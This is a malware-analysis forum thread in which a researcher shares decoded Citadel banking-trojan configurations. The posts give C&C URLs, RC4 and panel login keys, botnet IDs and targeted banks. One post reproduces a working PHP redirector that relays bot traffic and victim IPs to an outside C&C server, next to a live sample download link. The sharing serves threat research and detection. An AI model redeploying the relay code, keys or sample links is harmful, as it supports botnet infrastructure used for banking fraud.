A forum for reverse engineering, OS internals and malware analysis 

Citadel (Zeus clone)

Forum for analysis and discussion about malware.

Re: Citadel (Zeus clone)

 #20062  by Xylitol
 Fri Jul 12, 2013 11:53 am
Version 1.3.5.1 targeting wellsfargo.com
Code: Select all
Drop: hxtp://173.192.210.79/KEAGAN/BBA/gate.php
Update: hxtp://173.192.210.79/KEAGAN/BBA/file.php|file=soft.exe
Key: B5 45 6D 50 7D 87 0E 24 F7 55 60 7C 47 4C 15 E5
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
C&C
Code: Select all
hxtp://173.192.210.79/KEAGAN/BBA/install/
hxtp://173.192.210.79/KEAGAN/BBA/my.php?m=login
hxtp://173.192.210.79/KEAGAN/BBA/_lk3/files/CIT/
exe, plugin, config and decoded in attach
https://www.virustotal.com/en/file/0f3c ... 373629965/

Solving the last interesting old sample in this thread, rest are .zip without config.
Xylitol wrote:Fun
Code: Select all
00420CD8  |.  68 C0194000   PUSH 4019C0                              ; |Text = "Coded by BRIAN KREBS for personal use only. I love my job & wife."
two more C&C
Code: Select all
hxxp://inbani.com/js/res/cp.php?m=login
hxxp://inbani.com/js/res/theme/images/citadel.jpg
--
hxxp://lotosmusicfm.net/jstat/cp.php
hxxp://lotosmusicfm.net/jstat/theme/images/citadel.jpg
https://www.virustotal.com/file/6f6b5fe ... 338035569/
Citadel v1.3.4.0 targeting a lot of banks (chase, bank of america, capital one, pnc, american express...) and some germans banks.
Code: Select all
Drop: hxtp://metaxserv93.in/webstat79/info.php
Update: hxtp://metaxserv15.in/webstat79/file.php|file=volumeup.exe
Key: 62 86 90 BE 08 CB B0 C4 B5 25 0B 39 4D 82 65 02
Login key: 79B194D261FBD4BE3591802621C7E08E
Attachments
infected
(339.13 KiB) Downloaded 75 times
infected
(537.49 KiB) Downloaded 81 times

Re: Citadel (Zeus clone)

 #20206  by Xylitol
 Thu Jul 25, 2013 2:03 pm
Citadel 1.3.5.1 targeting french banks
Code: Select all
Drop: hxtp://madlion.sc/lion/file.php
Config: hxtp://madlion.sc/lion/file.php|file=cobra.exe
Panel: hxtp://madlion.sc/lion/control.php?m=login
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
I've lost the config file but the decoded version is in attach.
Attachments
infected
(230.31 KiB) Downloaded 104 times

Re: Citadel (Zeus clone)

 #20459  by wacked2
 Sun Aug 11, 2013 5:52 pm
It's an easy fix.
The interesting functions have simply been moved from nspr4 to ss3

Re: Citadel (Zeus clone)

 #20469  by Xylitol
 Mon Aug 12, 2013 2:32 pm
1.3.5.1 targeting CA/UK/DE/USA..
Code: Select all
Drop: hxtp://sellherro.ru/milk/file.php
Panel: hxtp://sellherro.ru/milk/xyz.php?m=login
Key: 73 D8 8F 18 73 71 52 88 38 D1 E5 E1 85 1C 44 6E
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
https://www.virustotal.com/en/file/be0f ... 376317996/
Attachments
infected
(276.25 KiB) Downloaded 98 times

Re: Citadel (Zeus clone)

 #20611  by Xylitol
 Tue Aug 27, 2013 1:24 pm
1.3.5.1 > https://www.virustotal.com/en/file/8b63 ... 377609564/
Code: Select all
Drop: hxtp://legitvendors.ru/wordpress.php
Config: hxtp://legitvendors.ru/file.php|file=svchosts.exe
Panel: hxtp://legitvendors.ru/visco.php?m=login
Key: 00 5D D0 64 F2 49 51 B0 42 D9 FC 49 C6 EC 38 2E
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Attachments
infected
(250.97 KiB) Downloaded 58 times

Re: Citadel (Zeus clone)

 #20613  by Xylitol
 Tue Aug 27, 2013 8:33 pm
Citadel 1.3.5.1
Code: Select all
Botnet ID: armani (alfabeta, axlogax, brand_new, haha, LLLLL, logmein, menu, menu2, omega, POS, text_corn, u, update, we_we_we, xyl)
Config: hxtp://symbian-theme.biz/armani/gallery.php|file=ssl_cert.exe
Drop: hxtp://real-life2013.in.ua/armani/buy.php
Key: 4F B8 51 53 B1 02 62 EC F5 02 8F 67 AD 1F 9B 00
Login key: 20038735198F82BC8495A2C1B01A9210
Code: Select all
Botnet ID: carfca (rf)
Config: hxtp://real-newslife.com/carfca/football.php|file=carfca.exe
Drop: hxtp://real-life-tips.com/carfca/basket.php
Key: 94 D3 A2 79 A4 12 23 5D 03 60 52 54 84 06 7C F1
Login key: 20038735198F82BC8495A2C1B01A9210
Code: Select all
Botnet ID: coconut
Config: hxtp://yahoo.com/coconut/footer.php|file=pop.exe
Drop: hxtp://agryasona.org/coconut/header.php
Key: D8 3F 6D 1E AA B2 4E C3 88 83 D1 CC 68 C5 F4 9A
Login key: 20038735198F82BC8495A2C1B01A9210
Code: Select all
Botnet ID: just (justme)
Config: hxtp://evenbegosurous.com/just/norton.php|file=pop.exe
Drop: hxtp://dolimdwe.com/just/ping.php
Key: B1 43 D3 D2 08 CF 08 B4 83 5B 37 C2 7B AF 8F CD
Login key: 20038735198F82BC8495A2C1B01A9210
Code: Select all
Botnet ID: pmserver
Config: hxtp://aquabox.in.ua/pmserver/browse.php|file=pmserver.exe
Drop: hxtp://printing-offices.com/pmserver/get.php
Key: 0F BD ED 17 8A 0F 7C 7D 37 1E 0C 3F 88 26 C3 09
Login key: 20038735198F82BC8495A2C1B01A9210
Code: Select all
Botnet ID: supernew (xxaaxxaaxx, canadas)
Config: hxtp://188.190.100.37/supernew/download.php|file=pop.exe
Drop: hxtp://real-life2013.in.ua/supernew/upload.php
Key: D8 3F 6D 1E AA B2 4E C3 88 83 D1 CC 68 C5 F4 9A
Login key: 20038735198F82BC8495A2C1B01A9210
Code: Select all
Botnet ID: uae (test)
Config: hxtp://geographic-channel.com/uae/viewlogo.php|file=doggy.exe
Drop: hxtp://aquabox.in.ua/uae/ping.php
Key: 92 B0 0C 09 C2 30 1F B4 65 FD 68 8D E1 79 C2 E9
Login key: 20038735198F82BC8495A2C1B01A9210
Image
'POS' indeed, several of these Citadel botnets was pushing Dexter and Alina.
No EXE files, just decoded configs in attach (took the keys from the panels...)
It was on the same server as my story here about Dexter: http://www.xylibox.com/2013/08/point-of ... exter.html

To give you an idea of the botnets:
Image Image Image
Image Image
Attachments
infected
(128.07 KiB) Downloaded 69 times

Re: Citadel (Zeus clone)

 #20669  by Xylitol
 Sun Sep 01, 2013 2:16 pm
1.3.5.1 almost no triggers:
*wellsfargo.com/*
*facebook.com/*
@*payment.com/*
Code: Select all
Drop: hxtp://www.faw.cl/images/fotos/web/citadelka/gate.php
Update: hxtp://www.faw.cl/images/fotos/web/citadelka/file.php|file=soft.exe
Key: 62 F0 67 D6 3B BC 2D 0F D0 EB 5F 63 2F F4 A4 A4
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Attachments
infected
(141.58 KiB) Downloaded 65 times

Re: Citadel (Zeus clone)

 #20688  by Xylitol
 Mon Sep 02, 2013 10:53 am
1.3.5.1
Code: Select all
Drop: hxtp://smic.hitc.edu.vn/modules/mod_xsystemx/redir.php
Config: hxtp://darklab.ru/conf/file.php|file=cfg.c
Key: A4 6D 4D 1E 22 49 A4 FE AC A9 E6 55 99 27 E0 0D
login key: C1F20D2340B519056A7D89B7DF4B0FFF
redir.php:
Code: Select all
<?php
//URL îðèãèíàëüíîãî ñåðâåðà.
$url = "http://gorktser.ru/srv/gate.php";

@error_reporting(0); @set_time_limit(0);

//Êîííåêòèìñÿ ê îðèãèíàëüíîìó ñåðâåðó.
$url = @parse_url($url);
if(!isset($url['port']))$url['port'] = 80; 
if(($real_server = @fsockopen($url['host'], $url['port'])) === false)die('E1');

//Ïîëó÷àåì äàííûå äëÿ ïåðåñûëêè.
if(($data = @file_get_contents('php://input')) === false)$data = '';

//Ôîðìèðóåì çàïðîñ.
$request  = "POST {$url['path']}?ip=".urlencode($_SERVER['REMOTE_ADDR'])." HTTP/1.0\r\n";
$request .= "Host: {$url['host']}\r\n";

if(!empty($_SERVER['HTTP_USER_AGENT']))$request .= "User-Agent: {$_SERVER['HTTP_USER_AGENT']}\r\n";

//$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Content-Length: ".strlen($data)."\r\n";
$request .= "Connection: Close\r\n";

//Îòïðàâëÿåì.
fwrite($real_server, $request."\r\n".$data);

//Ïîëó÷àåì îòâåò.
$result = '';
while(!feof($real_server))$result .= fread($real_server, 1024);
fclose($real_server);

//Âûâîäèì îòâåò.
echo substr($result, strpos($result, "\r\n\r\n") + 4);
?>
Image
Sample is also here:
Code: Select all
http://gorktser.ru/srv/files/loft_crptd(1).exe
(same hash)
Attachments
infected
(807.37 KiB) Downloaded 69 times
  • 1
  • 5
  • 6
  • 7
  • 8
  • 9
  • 20
 Return to “Malware”